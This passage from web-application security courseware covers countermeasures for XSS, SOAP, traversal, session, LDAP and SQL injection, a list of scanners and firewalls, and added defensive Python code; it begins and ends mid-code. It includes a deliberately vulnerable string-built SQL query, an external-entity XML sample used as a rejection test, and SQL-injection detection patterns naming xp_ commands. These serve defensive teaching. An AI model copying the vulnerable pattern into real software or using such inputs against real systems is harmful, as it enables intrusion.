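    return run_checked([sys.executable, "-c", "import sys; print(sys.argv[1])", value])
```

The contrast to notice is in the two build_* functions: the unsafe string keeps the separator, while the safe version refuses the input before any process is created.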
How to Defend Against XSS Attacks

• Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification
• Use testing tools extensively during the design phase to eliminate such XSS holes in the application before it goes into use
• Encode input and output and filter meta characters in the input
• Do not always trust websites that use HTTPS when it comes to XSS
• Use a web application firewall to block the execution of malicious script
• Filtering script output can also defeat XSS vulnerabilities by preventing them from being transmitted to users
• Convert all non-alphanumeric characters to HTML character entities before displaying the user input in search engines and forums
• Develop some standard or signing scripts with private and public keys that actually check to ascertain that the script introduced is really authenticated

The following are the defensive techniques to prevent XSS attacks:

• Check and validate all the form fields, hidden fields, headers, cookies, query strings, and all the parameters against a rigorous specification.
• Implement a stringent security policy.
• Web servers, application servers, and web application environments are vulnerable to cross-site scripting. It is hard to identify and remove XSS flaws from web applications. The best way to find flaws is to perform a security review of the code, and search all the places where input from an HTTP request comes out as output through HTML.
• A variety of different HTML tags can be used to transmit malicious JavaScript. Nessus, Nikto, and other tools can help to some extent in scanning websites for these flaws. If a vulnerability is discovered in one website, there is a high chance of it being vulnerable to other attacks.
• Filter the script output to defeat XSS vulnerabilities, which can prevent them from being transmitted to users.
• The entire code of the website has to be reviewed if it has to be protected against XSS attacks. The sanity of the code should be checked by reviewing and comparing it against exact specifications. The following areas should be checked: the headers, as well as cookies, query strings, form fields, and hidden fields. During the validation process, there must be no attempt to recognize the active content and remove, filter, or sanitize it.
• There are many ways to encode the known filters for active content. A "positive security policy" is highly recommended, which specifies what has to be allowed and what has to be removed. Negative or attack-signature-based policies are hard to maintain, as they are incomplete.
• Input fields should be limited to a maximum length, since most script attacks need several characters to get started.
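Two of the techniques above, the positive security policy per parameter (with a maximum length) and the conversion of every non-alphanumeric character to an HTML character entity before display, as an added Python example that is not part of the original module. The parameter names and patterns in FIELD_SPECS are constructed for the example.

```python
import re

# Constructed positive security policy: for each parameter, what is allowed
# (pattern) and how long it may be. Anything not listed here is rejected.
FIELD_SPECS = {
    "username": (re.compile(r"[A-Za-z0-9_]{3,20}"), 20),
    "comment": (re.compile(r"[A-Za-z0-9 .,!?'-]{1,200}"), 200),
}


def validate_param(name: str, value: str):
    """Return (accepted, reason). Rejects unknown parameters, over-long values,
    and any character outside the specification; it never tries to recognize
    or strip 'active content', it only allows what the spec allows."""
    spec = FIELD_SPECS.get(name)
    if spec is None:
        return False, "unknown parameter"
    pattern, max_len = spec
    if len(value) > max_len:
        return False, "too long"
    if pattern.fullmatch(value) is None:
        return False, "character not allowed"
    return True, "ok"


def encode_for_html(text: str) -> str:
    """Convert every character that is not an ASCII letter or digit into a
    numeric HTML entity, so the browser renders user input as text, never as
    markup or script, regardless of the context it is placed in."""
    return "".join(
        ch if (ch.isascii() and ch.isalnum()) else f"&#{ord(ch)};" for ch in text
    )


def render_search_result(query: str) -> str:
    """Output encoding applied at the point where user input goes into HTML."""
    return "<p>Results for: " + encode_for_html(query) + "</p>"
```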
How to Defend Against DoS Attacks

The following are the various measures that can be adopted to defend against DoS attacks:

• Configure the firewall to deny external Internet Control Message Protocol (ICMP) traffic access.
• Secure the remote administration and connectivity testing.
• Prevent the use of unnecessary functions such as gets and strcpy, and prevent return addresses from being overwritten, etc.
• Prevent sensitive information from being overwritten.
• Perform thorough input validation.
• Data processed by the attacker should be stopped from being executed.
How to Defend Against Web Services Attacks

To defend against web services attacks, there should be provision for multiple layers of protection that dynamically enforce legitimate application usage and block all known attack paths, with or without relying on signature databases. This combination has proven effective in blocking even unknown attacks. Standard HTTP authentication techniques such as digest and SSL client-side certificates can be used for web services as well. Since most models incorporate business-to-business applications, it becomes easier to restrict access to only valid users.

• Configure firewalls/IDSs for web services anomaly and signature detection.
• Configure WSDL Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages.
• Configure firewalls/IDS systems to filter improper SOAP and XML syntax.
• Use document-centric authentication credentials that use SAML.
• Implement centralized in-line request and response schema validation.
• Use multiple security credentials such as X.509 certificates, SAML assertions, and WS-Security.
• Block external references and use pre-fetched content when de-referencing URLs.
• Deploy web-services-capable firewalls capable of SOAP- and ISAPI-level filtering.
• Maintain and update a secure repository of XML schemas.
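An added Python example (not from the original module) of the in-line request validation the list calls for: the SOAP envelope is size-limited, DTD and entity declarations (the vehicle for external references) are refused before parsing, the envelope structure is checked, and the operation must appear in an allowlist that stands in for the schema repository. The namespace urn:example:orders, the operation names, and the sample messages are constructed.

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
MAX_BYTES = 64 * 1024

# Constructed allowlist standing in for the secure schema repository:
# operation element name -> namespace it must be declared in.
ALLOWED_OPERATIONS = {"GetOrderStatus": "urn:example:orders"}


def parse_soap_request(raw: bytes) -> str:
    """Validate a SOAP 1.1 request and return the permitted operation name,
    or raise ValueError with the reason it was rejected."""
    if len(raw) > MAX_BYTES:
        raise ValueError("request too large")
    upper = raw.upper()
    # Refuse any DTD: that is where external entities and references are declared.
    if b"<!DOCTYPE" in upper or b"<!ENTITY" in upper:
        raise ValueError("DTD/entity declarations are not accepted")
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        raise ValueError(f"malformed XML: {exc}") from None
    if root.tag != f"{{{SOAP_NS}}}Envelope":
        raise ValueError("root element is not a SOAP Envelope")
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None or len(body) != 1:
        raise ValueError("Body must contain exactly one operation element")
    op = body[0]
    if op.tag.startswith("{"):
        ns, _, name = op.tag[1:].partition("}")
    else:
        ns, name = "", op.tag
    if ALLOWED_OPERATIONS.get(name) != ns:
        raise ValueError(f"operation not permitted: {op.tag}")
    return name


def rejection_reason(raw: bytes):
    """None when the request is accepted, otherwise the rejection reason."""
    try:
        parse_soap_request(raw)
        return None
    except ValueError as exc:
        return str(exc)


# Constructed sample messages.
SAMPLE_OK = b"""<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <o:GetOrderStatus xmlns:o="urn:example:orders"><o:id>42</o:id></o:GetOrderStatus>
  </soap:Body>
</soap:Envelope>"""

SAMPLE_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE x [<!ENTITY ext SYSTEM "http://external.invalid/resource">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body/></soap:Envelope>"""

SAMPLE_UNKNOWN_OP = b"""<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body><o:UnknownOperation xmlns:o="urn:example:orders"/></soap:Body>
</soap:Envelope>"""
```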
Web Application Countermeasures

The following are the various countermeasures that can be adopted for web applications.

Unvalidated Redirects and Forwards
• Avoid using redirects and forwards.
• If destination parameters cannot be avoided, ensure that the supplied value is valid and authorized for the user.

Cross-Site Request Forgery
• Log off immediately after using a web application and clear the history.
• Do not allow your browser and websites to save login details.
• Check the HTTP Referer header and, when processing a POST, ignore URL parameters.

Broken Authentication and Session Management
• Use SSL for all authenticated parts of the application.
• Verify whether all the users' identities and credentials are stored in a hashed form.
• Never submit session data as part of a GET or POST.

Insecure Cryptographic Storage
• Do not create or use weak cryptographic algorithms.
• Generate encryption keys offline and store them securely.
• Ensure that encrypted data stored on disk is not easy to decrypt.
Web Application Countermeasures (Cont'd)

The following are the various countermeasures that can be adopted for web applications.

Insufficient Transport Layer Protection
• Non-SSL requests to web pages should be redirected to the SSL page.
• Set the 'secure' flag on all sensitive cookies.
• Configure the SSL provider to support only strong algorithms.
• Ensure the certificate is valid, not expired, and matches all domains used by the site.
• Backend and other connections should also use SSL or other encryption technologies.

Directory Traversal
• Define access rights to the protected areas of the website.
• Apply checks/hot fixes that prevent the exploitation of the vulnerability, such as the use of Unicode to effect directory traversal.
• Web servers should be updated with security patches in a timely manner.
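The check the Directory Traversal bullets refer to, as an added Python example that is not from the original module: the user-supplied path is decoded to one canonical form first (so percent- and double-encoded forms are judged after decoding), then resolved against the document root and rejected if it lands outside it. The root /srv/www is a constructed placeholder.

```python
from pathlib import Path
from urllib.parse import unquote


def resolve_safe(base_dir: str, user_path: str):
    """Map a user-supplied relative path onto base_dir. Return the resolved Path
    when it stays inside base_dir, otherwise None."""
    # Canonicalize before checking: undo percent-encoding (repeated, to catch
    # double encoding such as %252e). unquote() decodes as UTF-8, so overlong
    # or invalid byte sequences become replacement characters, not '.' or '/'.
    decoded = user_path
    for _ in range(3):
        once = unquote(decoded)
        if once == decoded:
            break
        decoded = once
    if "\x00" in decoded:
        return None  # NUL would truncate the path in C-based file APIs
    decoded = decoded.replace("\\", "/")  # treat backslash as a separator too
    base = Path(base_dir).resolve()
    # Leading slashes are stripped so an absolute path is still confined to base.
    candidate = (base / decoded.lstrip("/")).resolve()  # also follows symlinks
    try:
        candidate.relative_to(base)
    except ValueError:
        return None  # escaped the document root
    return candidate


def serve_path(base_dir: str, user_path: str) -> str:
    """Constructed handler: a string the test can check instead of file I/O."""
    target = resolve_safe(base_dir, user_path)
    return "403 Forbidden" if target is None else f"200 {target}"
```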
Cookie/Session Poisoning
• Do not store a plain-text or weakly encrypted password in a cookie.
• Implement cookie timeouts.
• A cookie's authentication credentials should be associated with an IP address.
• Make logout functions available.
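The Cookie/Session Poisoning bullets above, together with the earlier points on hashed credentials and the 'secure' cookie flag, as one added Python example (not code from the original module): the cookie carries only a random session token, the session is bound to the originating IP and times out, a logout function exists, the cookie is flagged Secure and HttpOnly, and passwords are stored as salted PBKDF2 hashes. The cookie name SESSIONID and the timeout are constructed.

```python
import hashlib
import hmac
import os
import time

SESSION_IDLE_TIMEOUT = 15 * 60  # seconds of inactivity before the session dies server-side


class SessionStore:
    """Server-side sessions: the cookie carries only a random token, never the
    password; each session is bound to the client IP it was created from and
    expires after SESSION_IDLE_TIMEOUT seconds without activity."""

    def __init__(self):
        self._sessions = {}

    def create(self, username: str, client_ip: str, now: float = None) -> str:
        token = os.urandom(32).hex()  # 256 bits of randomness, not guessable
        self._sessions[token] = {"user": username, "ip": client_ip,
                                 "last_seen": time.time() if now is None else now}
        return token

    def validate(self, token: str, client_ip: str, now: float = None):
        """Return the username for a live session, or None (unknown, expired, wrong IP)."""
        now = time.time() if now is None else now
        session = self._sessions.get(token)
        if session is None:
            return None
        if now - session["last_seen"] > SESSION_IDLE_TIMEOUT:
            del self._sessions[token]  # timed out: drop it so it cannot be replayed
            return None
        if session["ip"] != client_ip:
            return None  # credentials are tied to the originating IP address
        session["last_seen"] = now
        return session["user"]

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)  # the logout function users must be given


def session_cookie_header(token: str) -> str:
    """Secure: sent only over SSL/TLS; HttpOnly: not readable by page scripts;
    Max-Age mirrors the server-side idle timeout."""
    return (f"Set-Cookie: SESSIONID={token}; Secure; HttpOnly; Path=/; "
            f"Max-Age={SESSION_IDLE_TIMEOUT}")


def hash_password(password: str, salt: bytes = None) -> str:
    """Store credentials hashed (salted PBKDF2-HMAC-SHA256), never in plain text."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), 200_000
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)  # constant-time compare
```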
Web Application Countermeasures (Cont'd)

The following are the various countermeasures that can be adopted for web applications.

Security Misconfiguration
• Configure all security mechanisms and turn off all unused services.
• Set up roles, permissions, and accounts, and disable all default accounts or change their default passwords.
• Scan for the latest security vulnerabilities and apply the latest security patches.

LDAP Injection Attacks
• Perform type, pattern, and domain value validation on all input data.
• Make LDAP filters as specific as possible.
• Validate and restrict the amount of data returned to the user.
• Implement tight access control on the data in the LDAP directory.
• Perform dynamic testing and source code analysis.
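The first three LDAP bullets in code, as an added Python example that is not from the original module: pattern validation of the username, RFC 4515 escaping of the value placed in the filter, a filter that is as specific as possible (one object class, one attribute, exact match), and an explicit list of the attributes the application is allowed to receive. The username pattern, object class and attribute list are constructed.

```python
import re

# RFC 4515 escaping for values placed inside an LDAP search filter.
_LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}

# Constructed type/pattern specification for a login name.
_USERNAME_RE = re.compile(r"[a-z][a-z0-9._-]{2,31}")

# Restrict what the directory returns to the application: never "all attributes".
RETURNED_ATTRIBUTES = ["uid", "cn", "mail"]


def escape_ldap_filter_value(value: str) -> str:
    """Escape every filter metacharacter so the value can only match literally;
    it can neither close the current clause nor open another one."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def validate_username(value: str) -> bool:
    """Type/pattern validation: reject anything outside the specification."""
    return _USERNAME_RE.fullmatch(value) is not None


def build_user_lookup_filter(username: str) -> str:
    """Most specific filter possible for the lookup. Validation is the first
    layer; escaping is the second, so even a value that slipped past the
    pattern would still be treated as data inside the filter."""
    if not validate_username(username):
        raise ValueError("username fails type/pattern validation")
    return "(&(objectClass=inetOrgPerson)(uid=%s))" % escape_ldap_filter_value(username)
```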
File Injection Attack
• Strongly validate user input.
• Consider implementing a chroot jail.
• PHP: Disable allow_url_fopen and allow_url_include in php.ini.
• PHP: Disable register_globals and use E_STRICT to find uninitialized variables.
• PHP: Ensure that all file and stream functions (stream_*) are carefully vetted.
How to Defend Against Web Application Attacks

To defend against web application attacks, you can follow the countermeasures stated previously. To protect the web server, you can use a WAF firewall/IDS and filter packets. You need to constantly update the software using patches to keep the server up to date and to protect it from attackers. Sanitize and filter user input, analyze the source code for SQL injection, and minimize the use of third-party applications to protect the web applications. You can also use stored procedures and parameterized queries to retrieve data, disable verbose error messages, which can give the attacker useful information, and use custom error pages to protect the web applications. To avoid SQL injection into the database, connect using a non-privileged account and grant least privileges on the database, tables, and columns. Disable commands like xp_cmdshell, which can affect the OS of the system.
FIGURE 13.61: How to Defend Against Web Application Attacks (diagram labels: shut down the unnecessary services and ports; keep patches current; sanitize and filter user input; configure the firewall to deny external ICMP traffic access; perform input validation; use WAF firewall/IDS and filter packets; analyze the source code for SQL injection; minimize use of 3rd-party apps; connect to the database using a non-privileged account; use stored procedures and parameter queries; grant least privileges to the database, tables, and columns; perform dynamic testing and source code analysis; disable commands like xp_cmdshell; disable verbose error messages and use custom error pages; make LDAP filter as specific as possible)
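An added Python example (not code from the original module) of two points in the text above: the string-built query beside its parameterized form, showing that the placeholder keeps the input as data, and a handler that returns a generic custom error message instead of the driver's verbose one. It uses an in-memory SQLite table with constructed rows; SQLite has no user accounts, so the least-privilege connection advice is not shown here.

```python
import sqlite3

GENERIC_ERROR_MESSAGE = "The request could not be processed."  # custom error page text


def make_demo_db() -> sqlite3.Connection:
    """In-memory table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return conn


def find_user_vulnerable(conn, username: str) -> list:
    """Before: the input is spliced into the SQL text, so it can change the query."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_parameterized(conn, username: str) -> list:
    """After: a placeholder; the driver binds the value as data, never as SQL."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


def lookup_handler(conn, username: str, query=find_user_parameterized) -> dict:
    """Request handler that never leaks driver errors to the client: the detail
    belongs in the server log, the client receives the generic custom message."""
    try:
        return {"status": 200, "users": query(conn, username)}
    except sqlite3.Error as exc:
        print("server log: database error:", exc)  # goes to the log, not the response
        return {"status": 500, "body": GENERIC_ERROR_MESSAGE}
```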
Module Flow

Module flow: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, Web App Pen Testing.

Now we will discuss web application security tools. Web application security tools help you to detect possible vulnerabilities in web applications automatically. Prior to this, we discussed web application countermeasures that prevent attackers from exploiting web applications. In addition to countermeasures, you can also employ security tools to protect your web applications from being hacked. Tools, in addition to the countermeasures, offer more protection.

This section is dedicated to the security tools that protect web applications against various attacks.
Web Application Security Tool: Acunetix Web Vulnerability Scanner

Acunetix WVS checks web applications for SQL injection, cross-site scripting, etc.

• It includes advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
• Port scans a web server and runs security checks against network services
• Tests web forms and password-protected areas
• It includes an automatic client script analyzer allowing for security testing of Ajax and Web 2.0 applications

Source: http://www.acunetix.com

Acunetix Web Vulnerability Scanner automatically checks your web applications for SQL injection, XSS, and other web vulnerabilities. It includes advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer. It port scans a web server and runs security checks against network services. It even tests web forms and password-protected areas. The automatic client script analyzer allows for security testing of Ajax and Web 2.0 applications.
FIGURE 13.62: Acunetix Web Vulnerability Scanner Tool Screenshot
  • 220. Web Application Security Tool: Watcher Web Security Tool. [Screenshot: Watcher Web Security Tool v1.3.0 (Casaba Security, LLC, http://www.casaba.com) running inside Fiddler; the enabled checks include: Cache-Control HTTP header set on sensitive responses; a Content-Type header included in the HTTP response; IE8 XSS protection filter not disabled by the web application; X-CONTENT-TYPE-OPTIONS defence against MIME-sniffing declared; X-FRAME-OPTIONS header set for defence against ClickJacking attacks; common error messages returned by databases; sensitive information passed through URL parameters; common debug messages (PHP warnings, ASP.NET and web server errors such as IIS and Apache); checks cross-referenced to SDL, OWASP ASVS and WASC] Source: http://www.casaba.com. Watcher is a plugin for the Fiddler HTTP proxy that passively audits a web application to find security bugs and compliance issues automatically. Passive detection means it's safe for production use. It detects web-application security issues and operational configuration issues.
  • 221. FIGURE 13.63: Watcher Web Security Tool Screenshot
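As an added example (not Watcher's or Casaba's code), the following Python performs the kind of passive response-header audit described above on two constructed HTTP responses, a weak one and a hardened one; the check names are my reconstruction of the checks visible in the screenshot (plus the cookie Secure flag check that the Acunetix screenshot also reports), and nothing is sent to a server.

```python
"""Passive HTTP response audit in the style of the Watcher checks shown above.

Added example, not Watcher's or Casaba's code: the check names are my
reconstruction of the screenshot, and both sample responses are constructed.
The auditor only reads responses that were already captured, which is what
makes passive checking safe to run against production traffic.
"""
from typing import Dict, List, Tuple

# Constructed sample: a weak response (no hardening headers, insecure cookie,
# version-disclosing Server header, IE XSS filter switched off).
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.3\r\n"
    "Set-Cookie: SESSIONID=abc123; Path=/\r\n"
    "X-XSS-Protection: 0\r\n"
    "\r\n"
    "<html><body>Account balance: 42</body></html>"
)

# Constructed sample: the same page with the headers Watcher looks for.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Cache-Control: no-store, no-cache\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-Frame-Options: DENY\r\n"
    "Set-Cookie: SESSIONID=abc123; Path=/; Secure; HttpOnly\r\n"
    "\r\n"
    "<html><body>Account balance: 42</body></html>"
)


def parse_response(raw: str) -> Tuple[str, Dict[str, List[str]], str]:
    """Split a raw HTTP response into (status line, headers, body).

    Header names are lower-cased; repeated headers (several Set-Cookie lines)
    are kept as a list, which matters for the cookie checks.
    """
    head, _, body = raw.partition("\r\n\r\n")
    status, _, header_block = head.partition("\r\n")
    headers: Dict[str, List[str]] = {}
    for line in header_block.split("\r\n"):
        if ":" not in line:
            continue  # ignore malformed lines rather than failing the audit
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


def audit_response(raw: str) -> List[str]:
    """Return Watcher-style findings for one captured response (empty = clean)."""
    _, hdr, _ = parse_response(raw)
    findings: List[str] = []

    def first(name: str) -> str:
        return hdr.get(name, [""])[0].lower()

    if "content-type" not in hdr:
        findings.append("missing Content-Type (browser may sniff the type)")
    if "nosniff" not in first("x-content-type-options"):
        findings.append("X-Content-Type-Options: nosniff not declared")
    if "x-frame-options" not in hdr:
        findings.append("X-Frame-Options not set (no clickjacking defence)")
    if first("x-xss-protection").startswith("0"):
        findings.append("IE XSS filter explicitly disabled (X-XSS-Protection: 0)")
    if "no-store" not in first("cache-control"):
        findings.append("Cache-Control lacks no-store (response may be cached)")
    for cookie in hdr.get("set-cookie", []):
        name = cookie.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in cookie.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {name} without Secure flag")
        if "httponly" not in attrs:
            findings.append(f"cookie {name} without HttpOnly flag")
    if any(ch.isdigit() for ch in first("server")):
        findings.append(f"Server header discloses version: {first('server')}")
    return findings


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(raw) or ["no findings"])
```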
  • 222. Web Application Security Scanner: Netsparker. Netsparker performs automated comprehensive web application scanning for vulnerabilities such as SQL injection, cross-site scripting, remote code injection, etc. It delivers detection, confirmation, and exploitation of vulnerabilities in a single integrated environment. [Screenshot: Netsparker reporting a Cross-site Scripting finding on the vendor's test site, with URL, parameter name, parameter type, attack pattern, classification and vulnerability details panes] Source: http://www.mavitunasecurity.com. Netsparker® can find and report on security vulnerabilities such as SQL injection and cross-site scripting (XSS) in all web applications, regardless of the platform and the technology they are built on. It allows you to resolve security problems before they're actually misused and compromised by unknown attackers.
  • 223. [Screenshot: Netsparker 2.0.0.0 (Mavituna Security Limited) scan of test37.netsparker.com:8081 with a CONFIRMED Cross-site Scripting issue in the "param" querystring parameter of /dilemma/xsstb/reflected/32.php, classified as PCI 2.0 6.5.7, PCI 1.2 6.5.1 and OWASP A2; the details pane explains that XSS allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application, mostly to hijack the current session of the user or change the look of the page by changing the HTML on the fly; further issues: Apache Version Disclosure, PHP Version Disclosure, Apache Version Is Out Of Date; 37 total requests, elapsed time 00:00:10, scan and confirmation finished] FIGURE 13.64: Netsparker Tool Screenshot
  • 224. Web Application Security Tool: N-Stalker Web Application Security Scanner. [Screenshot: N-Stalker Web Application Security Scanner 2012 - Free Edition] http://nstalker.com. N-Stalker Web Application Security Scanner is an effective suite of web security assessment checks to enhance the overall security of web applications against a wide range of vulnerabilities and sophisticated hacker attacks. It contains all web security assessment checks such as: code injection, cross-site scripting, parameter tampering, web server vulnerabilities. Source: http://nstalker.com. N-Stalker Web Application Security Scanner provides an effective suite of web security assessment checks to enhance the overall security of your web applications against a wide range of vulnerabilities and sophisticated hacker attacks. It also allows you to create your own assessment policies and requirements, enabling an effective way to manage your application's SDLC, including the ability to control information exposure, development flaws, infrastructure issues, and real security vulnerabilities that can be explored by external agents. It contains all web security assessment checks such as code injection, cross-site scripting, parameter tampering, web server vulnerabilities, etc.
  • 225. [Screenshot: N-Stalker Web Application Security Scanner 2012 - Free Edition scanning http://10.0.0.2/: scan session dashboard with spider, scan engine, session control and false-positive control settings; 2926 total requests, 0 failed requests, 315 attacks sent, 2617 404 errors; 15 crawled URLs, cookies (11), scripts (11), comments (5), web forms (1); status "N-Stalker Scanner session is being closed"] FIGURE 13.65: N-Stalker Web Application Security Scanner Tool Screenshot
  • 226. Web Application Security Tool: VampireScan. VampireScan Features: protect your website from hackers; scan and protect your infrastructure and web applications from cyber-threats; give you direct, actionable insight on high, medium, and low risk vulnerabilities. Source: http://www.vampiretech.com. VampireScan allows users to test their own Cloud and Web applications for basic attacks and receive actionable results all within their own Web portal. It can protect your website from hackers. This tool can scan and protect your infrastructure and web applications from cyber-threats and can also give you direct, actionable insight on high, medium, and low risk vulnerabilities.
  • 227. [Screenshot: VampireScan web portal summary: statistics (queued scans, scans in progress, account balance, unused services, expiring unused services), security grades A to F, and a Recent Activity table of previous scans showing web site URL, description, scanner, latest results, date, grade and high/medium/low vulnerability counts] FIGURE 13.66: N-Stalker Web Application Security Scanner Tool Screenshot
  • 228. Web Application Security Tools. Web application security tools are web application security assessment software designed to thoroughly analyze today's complex web applications with the aim of finding exploitable SQL injection, XSS vulnerabilities, etc. These tools deliver scanning capabilities, broad assessment coverage, and accurate web application scanning results. Commonly used web application security tools are listed as follows:
    - Sandcat Mini available at http://www.syhunt.com
    - OWASP ZAP available at http://www.owasp.org
    - skipfish available at http://code.google.com
    - SecuBat Vulnerability Scanner available at http://secubat.codeplex.com
    - SPIKE Proxy available at http://www.immunitysec.com
    - Websecurify available at http://www.websecurify.com
    - NetBrute available at http://www.rawlogic.com
    - X5s available at http://www.casaba.com
    - WSSA - Web Site Security Scanning Service available at https://secure.beyondsecurity.com
  • 229. Web Application Security Tools (continued):
    - Ratproxy available at http://code.google.com
  • 230. Web Application Security Tools (Cont'd). In addition to the previously mentioned web application security tools, there are a few more tools that can be used to assess the security of web applications:
    - Wapiti available at http://wapiti.sourceforge.net
    - WebWatchBot available at http://www.exclamationsoft.com
    - KeepNI available at http://www.keepni.com
    - Grabber available at http://rgaucher.info
    - XSSS available at http://www.sven.de
    - Syhunt Hybrid available at http://www.syhunt.com
    - Exploit-Me available at http://labs.securitycompass.com
    - WSDigger available at http://www.mcafee.com
    - Arachni available at http://arachni-scanner.com
    - Vega available at http://www.subgraph.com
  • 231. Web Application Firewall: dotDefender. dotDefender is a software based Web Application Firewall. It complements the network firewall, IPS and other network-based Internet security products. It inspects the HTTP/HTTPS traffic for suspicious behavior. It detects and blocks SQL injection attacks. http://www.applicure.com [Screenshot: dotDefender SQL Injection settings, "Choose which type of SQL Injection attacks to intercept": Suspect Single Quote (Safe), Pattern = Pattern, Classic SQL Comment, SQL Comments, 'Union Select' Statement, 'Select Version' Statement, SQL CHAR Type, SQL SYS Commands, IS_SRVROLEMEMBER followed by (, MS SQL Specific SQL Injection] Source: http://www.applicure.com. dotDefender™ is a software-based web application firewall that provides additional website security against malicious attacks and website defacement. It protects your website from malicious attacks. Web application attacks such as SQL injection, path traversal, cross-site scripting, and other attacks leading to website defacement can be prevented with dotDefender. It complements the network firewall, IPS, and other network-based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior.
  • 232. [Screenshot: dotDefender (329 days left) management console under Internet Information Services: License, Global Settings, Default Security Profile (Protected) with Server Masking, Upload Folders and Patterns (Whitelist (Permitted Access), Paranoid, Encoding, Buffer Overflow, SQL Injection, User Defined, Best Practices, Cross-Site Scripting, Cookie Manipulation, Path Traversal, Probing, Remote Command Execution, Code Injection, Windows Directories, XML Schema, XPath Injection, XPath Cross-Site Scripting), Signatures (Use Default); the SQL Injection pane lists the same pattern checkboxes as on the previous slide] FIGURE 13.67: dotDefender
  • 233. Web Application Firewall: ServerDefender VP. ServerDefender VP Web application firewall is designed to provide security against web attacks. http://www.port80software.com [Screenshot: ServerDefender VP Settings Manager with Input Validation, Buffer Overflow, Resources, Methods, URLs, File Uploads, Exceptions and Common Threats tabs; Generic Input Sanitization levels None / Minimum / Extended / Paranoid] Source: http://www.port80software.com. The ServerDefender VP web application firewall is designed to provide security against web attacks. SDVP security will prevent data theft and breaches and stop unauthorized site defacement, file alterations, and deletions.
  • 234. [Screenshot: ServerDefender VP Settings Manager, protection for Default Web Site is ON; Input Validation tab with Generic Input Sanitization: None, Minimum [0-9, 11, 12, 14-31, 127, 175-223, 255], Extended [>, <, ' ...] + Minimum, Paranoid [| ...] + Extended; Sanitization Action: Deny and Log; Site Status pane with Enforcement Level 1 to 5, Blocked IPs, Alerting and Reporting; statistics since 11/8/2011: 26719 total HTTP requests, 752 total sessions created, 750 currently active sessions, 0 total blocked IPs, 0 currently blocked IPs, 723 total error count; error statistics per site broken down into 404, SQL, XSS, Input, Cookie and Other] FIGURE 13.68: ServerDefender VP
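As an added example (neither Applicure's nor Port80's code), the following Python reconstructs the two-stage request inspection suggested by the dotDefender SQL-injection pattern list (slides 231 and 232) and the ServerDefender VP generic input sanitization levels above: the rule names and the Minimum byte ranges come from the screenshots, while the regular expressions, the Extended/Paranoid character sets beyond what is legible, the treatment of "Suspect Single Quote (Safe)" as log-only, and the sample inputs are assumptions or constructed.

```python
"""Request-value inspection in the style of the dotDefender SQL-injection
patterns and the ServerDefender VP generic input sanitization levels.

Added example for illustration; it is neither vendor's code, and the regexes
are my reconstruction of the rule names in the screenshots, not the products'
actual signatures. Sample inputs below are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# dotDefender-style patterns: names from the screenshot, regexes assumed.
SQLI_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "Classic SQL Comment": re.compile(r"--|/\*|\*/"),
    "SQL Comments": re.compile(r"#\s*$"),
    "'Union Select' Statement": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S),
    "'Select Version' Statement": re.compile(r"\bselect\b.{0,20}\bversion\b", re.I),
    "SQL CHAR Type": re.compile(r"\bchar\s*\(\s*\d+", re.I),
    "SQL SYS Commands": re.compile(r"\b(xp_\w+|sp_\w+|sys\.\w+)", re.I),
    "IS_SRVROLEMEMBER followed by (": re.compile(r"\bis_srvrolemember\s*\(", re.I),
    # tautologies such as 1=1 or 'a'='a'
    "Pattern = Pattern": re.compile(r"(\w+|'[^']*'|\d+)\s*=\s*\1(?!\w)"),
}
# A lone single quote is only "suspect": legitimate input such as O'Brien has one.
SUSPECT_SINGLE_QUOTE = re.compile(r"'")

# ServerDefender-style sanitization levels. The Minimum byte ranges are those
# shown in the screenshot; the extra Extended/Paranoid characters are assumed.
MINIMUM_BYTES: Set[int] = (
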